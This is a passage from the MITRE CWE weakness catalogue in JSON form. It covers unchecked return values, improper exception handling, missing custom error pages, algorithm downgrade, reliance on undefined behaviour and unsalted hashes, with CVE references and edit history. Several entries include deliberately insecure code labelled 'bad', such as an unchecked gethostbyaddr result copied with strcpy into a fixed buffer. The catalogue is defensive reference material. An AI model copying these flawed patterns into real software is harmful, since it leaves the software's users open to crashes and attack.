{}...","xhtml:br":["",""],"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String itemName = request.Item(ITEM_NAME);if (itemName.Equals(IMPORTANT_ITEM)) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference.","The traditional defense of this coding error is: \\"I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn\'t matter whether I handle the error or simply allow the program to die dereferencing a null value.\\" But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved."]},{"attr":{"@_Demonstrative_Example_ID":"DX-11"},"Intro_Text":"The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"System.clearProperty(\\"os.name\\");...String os = System.getProperty(\\"os.name\\");if (os.equalsIgnoreCase(\\"Windows 95\\")) System.out.println(\\"Not supported\\");","xhtml:br":["","",""]}},"Body_Text":"The traditional defense of this coding error is: \\"I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn\'t matter whether I handle the error or simply allow the program to die dereferencing a null value.\\" But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved."},{"attr":{"@_Demonstrative_Example_ID":"DX-12"},"Intro_Text":"The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"Dim MyFile As New FileStream(\\"myfile.txt\\", FileMode.Open, FileAccess.Read, FileShare.Read)Dim MyArray(50) As ByteMyFile.Read(MyArray, 0, 50)DoDangerousOperation(MyArray(20))","xhtml:br":["","",""]}},"Body_Text":"In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference\\n\\t       (CWE-476) would then occur in the call to strcpy().","Note that this code is also vulnerable to a buffer overflow (CWE-119)."]},{"Intro_Text":"In the following C/C++ example the method outputStringToFile opens a file in the local filesystem and outputs a string to the file. The input parameters output and filename contain the string to output to the file and the name of the file respectively.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"int outputStringToFile(char *output, char *filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"openFileToWrite(filename);writeToFile(output);closeFile(filename);","xhtml:br":["","",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"int outputStringToFile(char *output, char *filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int isOutput = SUCCESS;int isOpen = openFileToWrite(filename);if (isOpen == FAIL) {}else {}return isOutput;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to open file %s\\", filename);isOutput = FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int isWrite = writeToFile(output);if (isWrite == FAIL) {}int isClose = closeFile(filename);if (isClose == FAIL)","xhtml:br":["","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to write to file %s\\", filename);isOutput = FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"isOutput = FAIL;","attr":{"@_style":"margin-left:10px;"}}]}}]}}}}],"Body_Text":"However, this code does not check the return values of the methods openFileToWrite, writeToFile, closeFile to verify that the file was properly opened and closed and that the string was successfully written to the file. The return values for these methods should be checked to determine if the method was successful and allow for detection of errors or unexpected conditions as in the following example."},{"Intro_Text":"In the following Java example the method readFromFile uses a FileReader object to read the contents of a file. The FileReader object is created using the File object readFile, the readFile object is initialized using the setInputFile method. The setInputFile method should be called before calling the readFromFile method.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private File readFile = null;public void setInputFile(String inputFile) {}public void readFromFile() {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// create readFile File object from string containing name of file"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (FileNotFoundException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"reader = new FileReader(readFile);","xhtml:br":["","",""],"xhtml:i":"// read input file"}}}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private File readFile = null;public void setInputFile(String inputFile) {}public void readFromFile() {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// create readFile File object from string containing name of file"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (FileNotFoundException ex) {...}catch (NullPointerException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (readFile == null) {}reader = new FileReader(readFile);","xhtml:div":{"#text":"System.err.println(\\"Input file has not been set, call setInputFile method before calling openInputFile\\");throw NullPointerException;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["","","","",""],"xhtml:i":"// read input file"}},"xhtml:br":""}}]}}],"Body_Text":"However, the readFromFile method does not check to see if the readFile object is null, i.e. has not been initialized, before creating the FileReader object and reading from the input file. The readFromFile method should verify whether the readFile object is null and output an error message and raise an exception if the readFile object is null, as in the following code."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-3798","Description":"Unchecked return value leads to resultant integer overflow and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3798"},{"Reference":"CVE-2006-4447","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447"},{"Reference":"CVE-2006-2916","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"CWE More Abstract"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Program Building Blocks&#34; Page 341"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 1, &#34;Exceptional Conditions,&#34; Page 22"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 11: Failure to Handle Errors Correctly.&#34; Page 183"}},{"attr":{"@_External_Reference_ID":"REF-622"}}]},"Notes":{"Note":{"#text":"Sometimes, when a return value can be used to indicate an error, an unchecked return value is a code-layer instance of a missing application-layer check for exceptional conditions. However, return values are not always needed to communicate exceptional conditions. For example, expiration of resources, values passed by reference, asynchronously modified data, sockets, etc. may indicate exceptional conditions without the use of a return value.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03","Submission_Comment":"New entry for reorganization of CWE-703."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Improper Check for Exceptional Conditions","attr":{"@_Date":"2010-02-16"}}}},"755":{"attr":{"@_ID":"755","@_Name":"Improper Handling of Exceptional Conditions","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not handle or incorrectly handles an exceptional condition.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2021-3011","Description":"virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011"},{"Reference":"CVE-2008-4302","Description":"Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4302"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03","Submission_Comment":"New entry for reorganization of CWE-703."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"756":{"attr":{"@_ID":"756","@_Name":"Missing Custom Error Page","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not return custom error pages to the user, possibly exposing sensitive information.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"209","@_View_ID":"1000"}}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Attackers can leverage the additional information provided by a default error page to mount attacks targeted on the framework, database, or other resources used by the application."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-76"},"Intro_Text":"In the snippet below, an unchecked runtime exception thrown from within the try block may cause the container to display its default error page (which may contain a full stack trace, among other things).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"#text":"try {} catch (ApplicationSpecificException ase) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"Caught: \\" + ase.toString());","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-75"},"Intro_Text":"The mode attribute of the &lt;customErrors&gt; tag in the Web.config file defines whether custom or default error pages are used.","Body_Text":["In the following insecure ASP.NET application setting, custom error message mode is turned off. An ASP.NET error message with detailed stack trace and platform versions will be returned.","A more secure setting is to set the custom error message mode for remote users only. No defaultRedirect error page is specified. The local user on the web server will see a detailed stack trace. For remote users, an ASP.NET error message with the server customError configuration setting and the platform version will be returned.","Another secure option is to set the mode attribute of the &lt;customErrors&gt; tag to use a custom page as follows:"],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":"&lt;customErrors mode=\\"Off\\" /&gt;"},{"attr":{"@_Nature":"good","@_Language":"ASP.NET"},"xhtml:div":"&lt;customErrors mode=\\"RemoteOnly\\" /&gt;"},{"attr":{"@_Nature":"good","@_Language":"ASP.NET"},"xhtml:div":"&lt;customErrors mode=\\"On\\" defaultRedirect=\\"YourErrorPage.htm\\" /&gt;"}]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03","Submission_Comment":"New entry for reorganization of CWE-703."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"757":{"attr":{"@_ID":"757","@_Name":"Selection of Less-Secure Algorithm During Negotiation (\'Algorithm Downgrade\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A protocol or its implementation supports interaction between multiple actors and allows those actors to negotiate which algorithm should be used as a protection mechanism such as encryption or authentication, but it does not select the strongest algorithm that is available to both parties.","Extended_Description":"When a security mechanism can be forced to downgrade to use a less secure algorithm, this can make it easier for attackers to compromise the software by exploiting weaker algorithm. The victim might not be aware that the less secure algorithm is being used. For example, if an attacker can force a communications channel to use cleartext instead of strongly-encrypted data, then the attacker could read the channel by sniffing, instead of going through extra effort of trying to decrypt the data using brute force techniques.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-4302","Description":"Attacker can select an older version of the software to exploit its vulnerabilities.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4302"},{"Reference":"CVE-2006-4407","Description":"Improper prioritization of encryption ciphers during negotiation leads to use of a weaker cipher.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4407"},{"Reference":"CVE-2005-2969","Description":"chain: SSL/TLS implementation disables a verification step (CWE-325) that enables a downgrade attack to a weaker protocol.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2969"},{"Reference":"CVE-2001-1444","Description":"Telnet protocol implementation allows downgrade to weaker authentication and encryption using an Adversary-in-the-Middle AITM attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1444"},{"Reference":"CVE-2002-1646","Description":"SSH server implementation allows override of configuration setting to use weaker authentication schemes. This may be a composite with CWE-642.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1646"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"220"}},{"attr":{"@_CAPEC_ID":"606"}},{"attr":{"@_CAPEC_ID":"620"}}]},"Notes":{"Note":{"#text":"This is related to CWE-300, although not all downgrade attacks necessarily require an entity that redirects or interferes with the network.  See examples.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"758":{"attr":{"@_ID":"758","@_Name":"Reliance on Undefined, Unspecified, or Implementation-Defined Behavior","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses an API function, data structure, or other entity in a way that relies on properties that are not always guaranteed to hold for that entity.","Extended_Description":"This can lead to resultant weaknesses when the required properties change, such as when the software is ported to a different platform or if an interaction error (CWE-435) occurs.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-1902","Description":"Change in C compiler behavior causes resultant buffer overflows in programs that depend on behaviors that were undefined in the C standard.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1902"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR32-C","Entry_Name":"Ensure size arguments for variable length arrays are in a valid range","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR34-C","Entry_Name":"Detect errors when converting a string to a number","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP30-C","Entry_Name":"Do not depend on the order of evaluation for side effects","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP33-C","Entry_Name":"Do not read uninitialized memory","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO46-C","Entry_Name":"Do not access a closed file","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT34-C","Entry_Name":"Do not shift an expression by a negative number of bits or by greater than or equal  to the number of bits that exist in the operand","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT36-C","Entry_Name":"Converting a pointer to integer or integer to pointer","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC14-C","Entry_Name":"Do not introduce unnecessary platform dependencies"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC15-C","Entry_Name":"Do not depend on undefined behavior"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC37-C","Entry_Name":"Ensure that control never reaches the end of a non-void function","Mapping_Fit":"CWE More Abstract"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"759":{"attr":{"@_ID":"759","@_Name":"Use of a One-Way Hash without a Salt","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the software does not also use a salt as part of the input.","Extended_Description":{"xhtml:p":["This makes it easier for attackers to pre-compute the hash value using dictionary attack techniques such as rainbow tables.","It should be noted that, despite common perceptions, the use of a good salt with a hash does not sufficiently increase the effort for an attacker who is targeting an individual password, or who has a large amount of computing resources available, such as with cloud-based services or specialized, inexpensive hardware. Offline password cracking can still be effective if the hash function is not expensive to compute; many cryptographic functions are designed to be efficient and can be vulnerable to attacks using massive computing resources, even if the hash is cryptographically strong. The use of a salt only slightly increases the computing requirements for an attacker compared to other strategies such as adaptive hash functions. See CWE-916 for more details."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"916","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Background_Details":{"Background_Detail":"In cryptography, salt refers to some random addition of data to an input before hashing to make dictionary attacks more difficult."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"If an attacker can gain access to the hashes, then the lack of a salt makes it easier to conduct brute force attacks using techniques such as rainbow tables."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial 